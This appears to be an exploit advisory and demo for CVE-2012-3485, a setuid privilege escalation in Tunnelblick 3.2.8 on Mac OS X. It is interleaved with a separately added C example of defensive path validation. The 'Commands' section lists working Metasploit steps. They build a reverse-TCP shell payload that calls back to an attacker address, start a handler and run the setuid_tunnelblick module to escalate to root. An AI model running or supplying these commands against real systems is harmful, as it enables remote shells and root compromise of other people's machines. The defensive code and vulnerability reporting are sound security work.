Timeline :
Vulnerability discovered and reported to the vendor by Jason A. Donenfeld on 2012-08-11
Metasploit PoC provided on 2013-03-03
PoC provided by :
Jason A. Donenfeld
juan vazquez
Reference(s) :
Affected version(s) :
Tunnelblick 3.2.8 and previous
Tested on Mac OS X 10.7.5 x64 with :
Tunnelblick 3.2.8
Description :
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid binary openvpnstart, where insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 on Mac OS X 10.7.5.
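The kind of path validation a setuid helper needs before it runs a script named by an unprivileged caller, as an added example that is not Tunnelblick's code or part of the original post. The function name, its parameters and the policy (script directly inside one owner-controlled directory) are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical check for a privileged helper (not Tunnelblick's code).
 * Returns an open fd for the script if it may be run, otherwise -1.
 * allowed_dir and owner are the helper's own policy, never caller input. */
int open_trusted_script(const char *path, const char *allowed_dir, uid_t owner)
{
    char real[PATH_MAX], root[PATH_MAX];
    struct stat st;
    /* Canonicalise both sides so "..", "//" and symlinks cannot step out. */
    if (!realpath(path, real) || !realpath(allowed_dir, root))
        return -1;

    /* The script must sit directly inside allowed_dir ("/a/b" vs "/a/bc"). */
    size_t n = strlen(root);
    if (strncmp(real, root, n) != 0 || real[n] != '/' ||
        strchr(real + n + 1, '/') != NULL)
        return -1;
    /* Nobody but the owner may be able to add or replace files there. */
    if (stat(root, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH)))
        return -1;

    /* Open first, then inspect the descriptor: fstat() describes the file
     * that was actually opened, so it cannot be swapped after the check. */
    int fd = open(real, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd; /* use this descriptor; do not resolve the path again */
}

int main(int argc, char **argv)
{
    if (argc != 3) { fprintf(stderr, "usage: %s SCRIPT DIR\n", argv[0]); return 2; }
    int fd = open_trusted_script(argv[1], argv[2], getuid());
    puts(fd >= 0 ? "trusted" : "rejected");
    return fd >= 0 ? 0 : 1;
}
```

In a real setuid-root helper the owner argument would be 0 and every ancestor of the allowed directory would also have to be root-owned and not writable by others.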
Commands :
Create an OS X x86 payload with msfpayload:
    msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload
Upload this payload to the victim OS X 10.7.5 machine.
    use exploit/multi/handler
    set PAYLOAD osx/x86/shell_reverse_tcp
    set LHOST 192.168.178.26
    exploit -j
Execute osx-payload; a session will be created. This session runs with the current user's privileges.
    use exploit/osx/local/setuid_tunnelblick
    set SESSION 1
    set PAYLOAD osx/x86/shell_reverse_tcp
    set LPORT 4445
    set LHOST 192.168.178.26
    exploit
    id
@eromang #Exploit #Video: #CVE-2012-3485 Setuid Tunnelblick Privilege Escalation #msf Demo http://t.co/iSvbnddEjv http://t.co/k2qdV2Npoc